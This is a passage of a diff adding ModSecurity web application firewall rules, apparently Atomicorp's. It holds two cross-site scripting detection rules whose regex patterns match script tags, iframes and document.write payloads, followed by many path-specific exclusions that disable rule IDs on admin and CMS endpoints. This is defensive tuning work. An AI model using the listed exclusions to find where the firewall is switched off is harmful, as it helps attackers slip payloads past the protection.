:/embed/|!ARGS:/desc/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:txt|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|< ?/?i?frame|\%env)"           "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:compressWhitespace,t:lowercase,capture,id:391147,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule ARGS|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS_NAMES|!ARGS:/li_field/|!ARGS:message|!ARGS:/media/|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:/^dbem/!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/option_tree/|!ARGS:/go_code/|!ARGS:/custom/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/_head_/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/suffix/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:/preview/|!ARGS:/tracking_extra/|!ARGS:SAMLResponse|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:sotenson|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/customfield/|!ARGS:val333|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/tracking/|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/jscode/|!ARGS:/keycaptcha_code/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:sidebar|!ARGS:analyticscode|!ARGS:top_news|!ARGS:tracking_code|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:whats-new|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/footer/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:/script/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:/^field_/|!ARGS:match_report|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:/^instance/|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?script|< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|document\.write ?\(|(?:<|< ?/) ?(?:(?:java|vb)script|applet|activex|chrome)|< ?/?i?frame|\% ?env)"          "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase,multiMatch,id:391148,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_92565
+
+SecRule REQUEST_FILENAME "/storefiles" "phase:2,id:92566,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/amember/default/admin-payments/p/invoices" "phase:2,id:92567,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/v1a/json/obmstore\.image\.delete" "phase:2,id:92568,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/modules/gateways/callback/paypalpaymentsproref\.php" "phase:2,id:92569,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/eafservice/jsp/v1/term" "phase:2,id:92570,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/s/ajax\.php" "phase:2,id:92571,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/ladm" "phase:2,id:92572,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/cgi-bin/jrental/scripts/command\.cgi" "phase:2,id:92573,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/v1b/json/obmstore\.template\.save/" "phase:2,id:92574,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/admin/lang_edit\.php" "phase:2,id:92575,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/amember/admin-setup" "phase:2,id:92576,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/1823/natives" "phase:2,id:92577,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/lists/admin" "phase:2,id:92578,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/memberadmin/prefs_email\.php" "phase:2,id:92579,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit\.php" "phase:2,id:92580,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"
+
+SecRule REQUEST_FILENAME "/services/bmcontent\.json" "phase:2,id:92581,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/remote\.php/dav/" "phase:2,id:92582,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=392301"
+
+SecRule REQUEST_FILENAME "/s/projects/save" "phase:2,id:92583,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/entries/about/98-about" "phase:2,id:92584,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/s/projects/save/2" "phase:2,id:92585,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/static_text/6" "phase:2,id:92586,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/entries/studies" "phase:2,id:92587,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/wp-json/baa/v2/register-broken-link" "phase:2,id:92588,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/cms/wp-admin/admin-ajax\.php" "phase:2,id:92589,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340748"
+
+SecRule REQUEST_FILENAME "/cms/wp-admin/post\.php" "phase:2,id:92590,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/wp-json/op3" "phase:2,id:92591,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/pages/edit/editform" "phase:2,id:92592,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/amember/admin-users" "phase:2,id:92593,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/amember/admin-trans-global" "phase:2,id:92594,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/v1b/json/fr\.image\.delete/" "phase:2,id:92595,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit-tags\.php" "phase:2,id:92596,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/json/fr\.device\.preview/" "phase:2,id:92597,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/lms/test/addquestion" "phase:2,id:92598,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/lms/test/editquestion" "phase:2,id:92599,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/lms/test/edittest" "phase:2,id:92600,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/lms/test/create" "phase:2,id:92601,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/lms/test/addtest" "phase:2,id:92602,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/s/news/save" "phase:2,id:92603,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/en/employer_signup\.php" "phase:2,id:92604,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/entity_reference_autocomplete/node/" "phase:2,id:92605,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/autobrite-magifoam" "phase:2,id:92606,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/wp-json/redirection/v1/redirect/post" "phase:2,id:92607,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/autodiscover/autodiscover\.xml" "phase:2,id:92608,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=390616"
+
+SecRule REQUEST_FILENAME "/admin/index\.php" "phase:2,id:92609,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147"
+
+SecRule REQUEST_FILENAME "/admin/food-menus/" "phase:2,id:92610,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/entries/events/" "phase:2,id:92611,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/_fragment" "phase:2,id:92612,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/secutran" "phase:2,id:92613,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/quickbooks/mirror\.php" "phase:2,id:92614,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/v1c/json/" "phase:2,id:92615,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/json/fr\.template\.save" "phase:2,id:92616,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/json/en\.template\.save" "phase:2,id:92617,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/json/fr\.template\.convert" "phase:2,id:92618,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/json/en\.template\.convert" "phase:2,id:92619,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/json/fr\.image\.delete/" "phase:2,id:92620,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/json/fr\.image\.save/" "phase:2,id:92621,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/json/en\.image\.delete/" "phase:2,id:92622,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/json/en\.image\.save/" "phase:2,id:92623,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/vip/bonus\.php" "phase:2,id:92624,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/cvs3/" "phase:2,id:92625,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390616"
+
+SecRule REQUEST_FILENAME "/php/upd\.php" "phase:2,id:92626,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/core/admin/auth\.php" "phase:2,id:92627,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
